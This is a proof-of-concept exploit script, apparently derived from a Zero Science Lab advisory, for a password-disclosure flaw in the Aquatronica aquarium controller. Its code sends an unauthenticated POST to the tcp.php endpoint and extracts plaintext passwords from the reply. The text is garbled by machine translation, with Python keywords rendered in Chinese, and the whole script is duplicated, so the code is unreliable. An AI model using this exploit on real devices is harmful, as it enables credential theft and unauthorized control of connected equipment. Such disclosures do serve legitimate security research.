#!/usr/bin/env Python
# - * - 编码: UTF-8 - * -
#
#
#Aquatronica控制系统5.1.6密码泄漏漏洞
#
#
#vendor: Aquatronica S.R.L.
#产品网页: https://www.aquatronica.com
#受影响的版本:固件: 5.1.6
#Web: 2.0
#
#摘要: Aquatronica的电子水族馆控制器很容易
#要使用,允许您控制所有电气设备
#水族馆并监视其所有参数;可以使用
#对于软水水族馆,盐水水族馆或两者均模拟。
#
#desc: aquatronica控制器上的tcp.php端点已公开
#通过网络未经身份验证的攻击者。这个脆弱性
#允许远程攻击者发送可以揭示的帖子请求
#敏感配置信息,包括明文密码。
#这可能导致未经授权的访问和控制水族馆
#控制器,损害其安全性,并有可能允许攻击者
#操纵其设置。
#
#测试ON: Apache/2.0.54(UNIX)
#PHP/5.4.17
#
#
#由gjoko'liquidworm'Krstic发现的脆弱性
#@zeroscience
#
#
#咨询ID: ZSL-2024-5824
#咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.PHP
#
#
#04.05.2024
#
导入请求,HTML,RE,SYS,时间
来自urllib.parse导入UnQuote
程序='TCP'
命令='ws_get_network_cfg'
function_id='tcp_xml_request'
打印(''''
_________。
(. \ _,| \ /|
\ o \ /| \///
\ ______ \/| \ /
vvvv \ \ |/|
\ ^^^^==\ _/|
`\ _===\。 |
//\ _ \/|
|/\ _ \ | /
_________________________/__________ aquatronica_0day___
| |
| |
| |
''))
如果Len(sys.argv)!=2:
打印('USAGE: Python Aqua.py ip
ort')
sys.exit(1)
ip=sys.argv [1]
url=f'http://{ip}/{program.lower()}。
post_data={'function_id': function_id.lower(),
'命令': command.upper()}
r=requests.post(url,data=post_data)
如果r.status_code==200:
r_d=unquote(r.text)
f_d_r=html.unescape(r_d)
REGEX=r'pwd='([^']+)'''
雨=re.findall(正则f_d_r)
对于雨水:
打印('',滴)
时间。
其他:
打印(f'dry季节!{r.status_code}')
# - * - 编码: UTF-8 - * -
#
#
#Aquatronica控制系统5.1.6密码泄漏漏洞
#
#
#vendor: Aquatronica S.R.L.
#产品网页: https://www.aquatronica.com
#受影响的版本:固件: 5.1.6
#Web: 2.0
#
#摘要: Aquatronica的电子水族馆控制器很容易
#要使用,允许您控制所有电气设备
#水族馆并监视其所有参数;可以使用
#对于软水水族馆,盐水水族馆或两者均模拟。
#
#desc: aquatronica控制器上的tcp.php端点已公开
#通过网络未经身份验证的攻击者。这个脆弱性
#允许远程攻击者发送可以揭示的帖子请求
#敏感配置信息,包括明文密码。
#这可能导致未经授权的访问和控制水族馆
#控制器,损害其安全性,并有可能允许攻击者
#操纵其设置。
#
#测试ON: Apache/2.0.54(UNIX)
#PHP/5.4.17
#
#
#由gjoko'liquidworm'Krstic发现的脆弱性
#@zeroscience
#
#
#咨询ID: ZSL-2024-5824
#咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.PHP
#
#
#04.05.2024
#
导入请求,HTML,RE,SYS,时间
来自urllib.parse导入UnQuote
程序='TCP'
命令='ws_get_network_cfg'
function_id='tcp_xml_request'
打印(''''
_________。
(. \ _,| \ /|
\ o \ /| \///
\ ______ \/| \ /
vvvv \ \ |/|
\ ^^^^==\ _/|
`\ _===\。 |
//\ _ \/|
|/\ _ \ | /
_________________________/__________ aquatronica_0day___
| |
| |
| |
''))
如果Len(sys.argv)!=2:
打印('USAGE: Python Aqua.py ip
ort')sys.exit(1)
ip=sys.argv [1]
url=f'http://{ip}/{program.lower()}。
post_data={'function_id': function_id.lower(),
'命令': command.upper()}
r=requests.post(url,data=post_data)
如果r.status_code==200:
r_d=unquote(r.text)
f_d_r=html.unescape(r_d)
REGEX=r'pwd='([^']+)'''
雨=re.findall(正则f_d_r)
对于雨水:
打印('',滴)
时间。
其他:
打印(f'dry季节!{r.status_code}')